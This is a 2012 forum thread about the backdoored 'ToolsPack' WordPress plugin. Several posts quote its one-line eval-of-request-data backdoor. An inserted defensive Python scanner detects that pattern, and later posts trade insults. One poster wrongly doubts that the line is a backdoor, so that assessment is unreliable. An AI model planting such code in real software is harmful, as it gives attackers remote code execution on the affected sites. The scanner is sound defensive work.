Thread: Wordpress malware

  1. #1
    Han Guest

    Wordpress malware

    My son alerts everyone for this backdoor malware:

    Please, people, for the love of WordPress...DO NOT install the 'ToolsPack'
    plugin. It's pure malware.

    Explained here:
    http://blog.sucuri.net/2012/02/new-w...ck-plugin.html

    I have no relevant knowledge myself, but trust my son, so please evaluate
    yourselves!
    --
    Best regards
    Han
    email address is invalid

  2. #2
    VanguardLH Guest

    Re: Wordpress malware

    Han wrote:

    > My son alerts everyone for this backdoor malware:
    >
    > Please, people, for the love of WordPress...DO NOT install the 'ToolsPack'
    > plugin. It's pure malware.
    >
    > Explained here:
    > http://blog.sucuri.net/2012/02/new-w...ck-plugin.html
    >
    > I have no relevant knowledge myself, but trust my son, so please evaluate
    > yourselves!


    If your "son" claims sufficient expertise to declare some software as
    malware then your son also has sufficient expertise to post here himself
    along with including details of the behavior of the pest. Your report
    here is hearsay and provides no useful info about the claimed pest. Bad
    code or unwanted behavior does not dictate malware. There is tons of
    crap code out there but it's not malware, just crapware.

    The plugin, as noted in the referenced article, has only a single line
    of PHP code. It affects ONLY the site that chooses to install this
    server-side code.

    $_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) )

    From http://php.net/manual/en/reserved.variables.request.php, I'm not
    sure how the line in the referenced article could be considered a
    backdoor unless there is a bug in the PHP interpreter itself. Being a
    global variable doesn't alone make for a backdoor but the scope of the
    variable could mean code gets injected out of the intended local scope.
    It looks like if the contents of GET, POST, or COOKIE are not null then
    the expression gets evaluated (which is the Base64 decoding of what got
    retrieved from the client). eval interprets what gets retrieved from
    the client and apparently that could be PHP command(s) (which would run
    under global scope). From what I've found in a quick search, this isn't
    the only PHP or other-script backdoor to compromise a *site*. It's up
    to the web designer to know what code they are putting up there, and
    this one was damn short for easy interrogation before deployment.

    This is possibly a server security issue at a site. It is not malware
    to clients.
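
An added example, not part of the original posts or of the plugin: a small static check a site owner could run over plugin files before deployment to flag the pattern discussed above, an eval-like call whose argument comes from client-controlled request data. The function names and the sample inputs are constructed for illustration; the match is case-insensitive because PHP function names are, so the mixed-case `eVAl` in the quoted line behaves exactly like `eval`.

```python
import re

# Superglobals that PHP fills from client-controlled GET, POST or COOKIE data.
TAINT = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b")
# PHP function names are case-insensitive, so match `eVAl` as well as `eval`.
# assert() with a string argument also evaluated code before PHP 8.
SINK = re.compile(r"\b(eval|assert)\s*\(", re.IGNORECASE)
DECODER = re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.IGNORECASE)

def balanced_args(src, open_idx):
    """Return the text between the '(' at open_idx and its matching ')'."""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
    return src[open_idx + 1:]  # unbalanced: treat the rest as the argument

def scan_php(src):
    """Return [(line_no, sink, decoders)] for eval-like calls fed by request data."""
    findings = []
    for m in SINK.finditer(src):
        args = balanced_args(src, m.end() - 1)
        if TAINT.search(args):
            line_no = src.count("\n", 0, m.start()) + 1
            decoders = [d.group(1).lower() for d in DECODER.finditer(args)]
            findings.append((line_no, m.group(1).lower(), decoders))
    return findings

# Constructed sample: a plugin header wrapped around the line quoted in the thread.
SAMPLE_PLUGIN = """<?php
/* Plugin Name: ToolsPack */
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) )
"""

# Constructed benign sample: decoding and eval exist, but never on request data.
SAMPLE_BENIGN = """<?php
$title = base64_decode($stored);
echo strtoupper($_GET['q']);
eval($trusted_template);
"""

if __name__ == "__main__":
    print(scan_php(SAMPLE_PLUGIN))
    print(scan_php(SAMPLE_BENIGN))
```

This is a plain text match, so it does not follow request data through intermediate variables; a hit is a reason to read the file, and a miss is not proof the file is clean.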

  3. #3
    Han Guest

    Re: Wordpress malware

    VanguardLH <V@nguard.LH> wrote in news:jjbbak$ul3$1@news.albasani.net:

    > Han wrote:
    >
    >> My son alerts everyone for this backdoor malware:
    >>
    >> Please, people, for the love of WordPress...DO NOT install the
    >> 'ToolsPack' plugin. It's pure malware.
    >>
    >> Explained here:
    >> http://blog.sucuri.net/2012/02/new-w...ck-plugin.html
    >>
    >> I have no relevant knowledge myself, but trust my son, so please
    >> evaluate yourselves!

    >
    > If your "son" claims sufficient expertise to declare some software as
    > malware then your son also has sufficient expertise to post here
    > himself along with including details of the behavior of the pest.
    > Your report here is hearsay and provides no useful info about the
    > claimed pest. Bad code or unwanted behavior does not dictate malware.
    > There is tons of crap code out there but it's not malware, just
    > crapware.
    >
    > The plugin, as noted in the referenced article, has only a single line
    > of PHP code. It affects ONLY the site that chooses to install this
    > server-side code.
    >
    > $_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) )
    >
    > From http://php.net/manual/en/reserved.variables.request.php, I'm not
    > sure how the line in the referenced article could be considered a
    > backdoor unless there is a bug in the PHP interpreter itself. Being a
    > global variable doesn't alone make for a backdoor but the scope of the
    > variable could mean code gets injected out of the intended local
    > scope. It looks like if the contents of GET, POST, or COOKIE are not
    > null then the expression gets evaluated (which is the Base64 decoding
    > of what got retrieved from the client). eval interprets what gets
    > retrieved from the client and apparently that could be PHP command(s)
    > (which would run under global scope). From what I've found in a quick
    > search, this isn't the only PHP or other-script backdoor to compromise
    > a *site*. It's up to the web designer to know what code they are
    > putting up there, and this one was damn short for easy interrogation
    > before deployment.
    >
    > This is possibly a server security issue at a site. It is not malware
    > to clients.


    Wordpress is some kind of blogging software <http://wordpress.org/>.
    With the highly touted plugins they claim to have available, you seem to
    be able to build a website yourself, so if the code you use is buggy or
    malware (as this may or may not be), that may introduce some really bad
    stuff in your personalized website. As you may know, there is a huge
    proliferation of these types of sites, and it wouldn't surprise me if
    malware authors would like to put some universally applicable creepy
    backdoors in these DIY sites. Undoubtedly some of the websites will have
    ways to collect money for purchases. Hmmm.


    --
    Best regards
    Han
    email address is invalid

  4. #4
    VanguardLH Guest

    Re: Wordpress malware

    Han wrote:

    > VanguardLH <V@nguard.LH> wrote in news:jjbbak$ul3$1@news.albasani.net:
    >
    >> Han wrote:
    >>
    >>> My son alerts everyone for this backdoor malware:
    >>>
    >>> Please, people, for the love of WordPress...DO NOT install the
    >>> 'ToolsPack' plugin. It's pure malware.
    >>>
    >>> Explained here:
    >>> http://blog.sucuri.net/2012/02/new-w...ck-plugin.html
    >>>
    >>> I have no relevant knowledge myself, but trust my son, so please
    >>> evaluate yourselves!

    >>
    >> If your "son" claims sufficient expertise to declare some software as
    >> malware then your son also has sufficient expertise to post here
    >> himself along with including details of the behavior of the pest.
    >> Your report here is hearsay and provides no useful info about the
    >> claimed pest. Bad code or unwanted behavior does not dictate malware.
    >> There is tons of crap code out there but it's not malware, just
    >> crapware.
    >>
    >> The plugin, as noted in the referenced article, has only a single line
    >> of PHP code. It affects ONLY the site that chooses to install this
    >> server-side code.
    >>
    >> $_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) )
    >>
    >> From http://php.net/manual/en/reserved.variables.request.php, I'm not
    >> sure how the line in the referenced article could be considered a
    >> backdoor unless there is a bug in the PHP interpreter itself. Being a
    >> global variable doesn't alone make for a backdoor but the scope of the
    >> variable could mean code gets injected out of the intended local
    >> scope. It looks like if the contents of GET, POST, or COOKIE are not
    >> null then the expression gets evaluated (which is the Base64 decoding
    >> of what got retrieved from the client). eval interprets what gets
    >> retrieved from the client and apparently that could be PHP command(s)
    >> (which would run under global scope). From what I've found in a quick
    >> search, this isn't the only PHP or other-script backdoor to compromise
    >> a *site*. It's up to the web designer to know what code they are
    >> putting up there, and this one was damn short for easy interrogation
    >> before deployment.
    >>
    >> This is possibly a server security issue at a site. It is not malware
    >> to clients.

    >
    > Wordpress is some kind of blogging software <http://wordpress.org/>.
    > With the highly touted plugins they claim to have available, you seem to
    > be able to build a website yourself, so if the code you use is buggy or
    > malware (as this may or may not be), that may introduce some really bad
    > stuff in your personalized website. As you may know, there is a huge
    > proliferation of these types of sites, and it wouldn't surprise me if
    > malware authors would like to put some universally applicable creepy
    > backdoors in these DIY sites. Undoubtedly some of the websites will have
    > ways to collect money for purchases. Hmmm.


    I haven't found a Wordpress-based site that I cared to remember. I only
    know of them by accidental visits: something I clicked on took me to one
    of these garbage sites and I immediately left. I'm not interested in
    someone's blog to stroke their ego in public or pretend it's a news or
    help site. I don't waste my time with Facebook, either.

    There are lots of vulnerabilities listed by Secunia for the plug-ins and
    even for Wordpress itself. Backdoors have been present since the
    introduction of WordPress. With somewhere around 18,000 plug-ins, I
    doubt there's any real quality checking going on. I find the less
    number of Firefox extensions to have a lot of garbage there, too.

  5. #5
    Dustin Guest

    Re: Wordpress malware

    VanguardLH <V@nguard.LH> wrote in news:jjc9ao$698$1@news.albasani.net:

    > me to one of these garbage sites and I immediately left. I'm not
    > interested in someone's blog to stroke their ego in public or pretend
    > it's a news or help site. I don't waste my time with Facebook,


    Just your own right? You know, the typical arrogant remarks you tend to
    make, only to be corrected for it later in the thread.

    > doubt there's any real quality checking going on. I find the less
    > number of Firefox extensions to have a lot of garbage there, too.


    Yes, and the consistent pissing and moaning you do. It's annoying. If you
    find such terrible problems in everything you try or site you visit,
    consider writing and supporting your own software and or your own website.

    You just seem like an arrogant self righteous ungrateful ****in prick. You
    don't actually mean to come across that way, right?


    --
    Character is doing the right thing when nobody's looking. There are too
    many people who think that the only thing that's right is to get by, and
    the only thing that's wrong is to get caught. - J.C. Watts

  6. #6
    Aardvark Guest

    Re: Wordpress malware

    On Fri, 09 Mar 2012 16:41:59 +0000, Dustin wrote:

    > VanguardLH <V@nguard.LH> wrote in news:jjc9ao$698$1@news.albasani.net:
    >
    >> me to one of these garbage sites and I immediately left. I'm not
    >> interested in someone's blog to stroke their ego in public or pretend
    >> it's a news or help site. I don't waste my time with Facebook,

    >
    > Just your own right? You know, the typical arrogant remarks you tend to
    > make, only to be corrected for it later in the thread.
    >
    >> doubt there's any real quality checking going on. I find the less
    >> number of Firefox extensions to have a lot of garbage there, too.

    >
    > Yes, and the consistent pissing and moaning you do. It's annoying. If
    > you find such terrible problems in everything you try or site you visit,
    > consider writing and supporting your own software and or your own
    > website.
    >
    > You just seem like an arrogant self righteous ungrateful ****in prick.
    > You don't actually mean to come across that way, right?


    And very wordy, Dustin. You forgot that bit.

    :-)



    --
    "Any man's death diminishes me, because I am involved
    in mankind, and therefore never send to know for whom
    the bell tolls; it tolls for thee".
    -John Donne (1572-1631)

  7. #7
    Timmy Guest

    Re: Wordpress malware

    Aardvark wrote...

    >
    > On Fri, 09 Mar 2012 16:41:59 +0000, Dustin wrote:
    >
    > > VanguardLH <V@nguard.LH> wrote in news:jjc9ao$698$1@news.albasani.net:
    > >
    > >> me to one of these garbage sites and I immediately left. I'm not
    > >> interested in someone's blog to stroke their ego in public or pretend
    > >> it's a news or help site. I don't waste my time with Facebook,

    > >
    > > Just your own right? You know, the typical arrogant remarks you tend to
    > > make, only to be corrected for it later in the thread.
    > >
    > >> doubt there's any real quality checking going on. I find the less
    > >> number of Firefox extensions to have a lot of garbage there, too.

    > >
    > > Yes, and the consistent pissing and moaning you do. It's annoying. If
    > > you find such terrible problems in everything you try or site you visit,
    > > consider writing and supporting your own software and or your own
    > > website.
    > >
    > > You just seem like an arrogant self righteous ungrateful ****in prick.
    > > You don't actually mean to come across that way, right?

    >
    > And very wordy, Dustin. You forgot that bit.
    >
    > :-)



    AOL




  8. #8
    VanguardLH Guest

    Re: Wordpress malware

    Dustin wrote:

    > VanguardLH <V@nguard.LH> wrote in news:jjc9ao$698$1@news.albasani.net:
    >
    >> me to one of these garbage sites and I immediately left. I'm not
    >> interested in someone's blog to stroke their ego in public or pretend
    >> it's a news or help site. I don't waste my time with Facebook,

    >
    > Just your own right? You know, the typical arrogant remarks you tend to
    > make, only to be corrected for it later in the thread.
    >
    >> doubt there's any real quality checking going on. I find the less
    >> number of Firefox extensions to have a lot of garbage there, too.

    >
    > Yes, and the consistent pissing and moaning you do. It's annoying. If you
    > find such terrible problems in everything you try or site you visit,
    > consider writing and supporting your own software and or your own website.
    >
    > You just seem like an arrogant self righteous ungrateful ****in prick. You
    > don't actually mean to come across that way, right?


    Oh, and of course, your whining is so much more enlightening. Stop
    whining about my whining.

    Reminds me of the joke where there are two fat ladies in a bakery shop.
    One turns to the other and says, "Every time I'm in here I see you here."

  9. #9
    Dustin Guest

    Re: Wordpress malware

    VanguardLH <V@nguard.LH> wrote in news:jjdopn$9jq$1@news.albasani.net:

    > Dustin wrote:
    >
    >> VanguardLH <V@nguard.LH> wrote in
    >> news:jjc9ao$698$1@news.albasani.net:
    >>
    >>> me to one of these garbage sites and I immediately left. I'm not
    >>> interested in someone's blog to stroke their ego in public or
    >>> pretend it's a news or help site. I don't waste my time with
    >>> Facebook,

    >>
    >> Just your own right? You know, the typical arrogant remarks you tend
    >> to make, only to be corrected for it later in the thread.
    >>
    >>> doubt there's any real quality checking going on. I find the less
    >>> number of Firefox extensions to have a lot of garbage there, too.

    >>
    >> Yes, and the consistent pissing and moaning you do. It's annoying.
    >> If you find such terrible problems in everything you try or site you
    >> visit, consider writing and supporting your own software and or your
    >> own website.
    >>
    >> You just seem like an arrogant self righteous ungrateful ****in
    >> prick. You don't actually mean to come across that way, right?

    >
    > Oh, and of course, your whining is so much more enlightening. Stop
    > whining about my whining.


    Cite message IDs where I've been whining please. Off the top of my head,
    I can think of several of yours. The hijackthis complaint being the best
    one so far.

    > Reminds me of the joke where there are two fat ladies in a bakery
    > shop. One turns to the other and says, "Every time I'm in here I see
    > you here."


    Doesn't really apply. You'd be the fat lady munching a pie, I'd be the
    happy baker accepting your money for it. I guess the lady you're talking
    to is a friend? Maybe the two of you can carpool and combine funds to
    take some cheap computer classes.





    --
    Character is doing the right thing when nobody's looking. There are too
    many people who think that the only thing that's right is to get by, and
    the only thing that's wrong is to get caught. - J.C. Watts
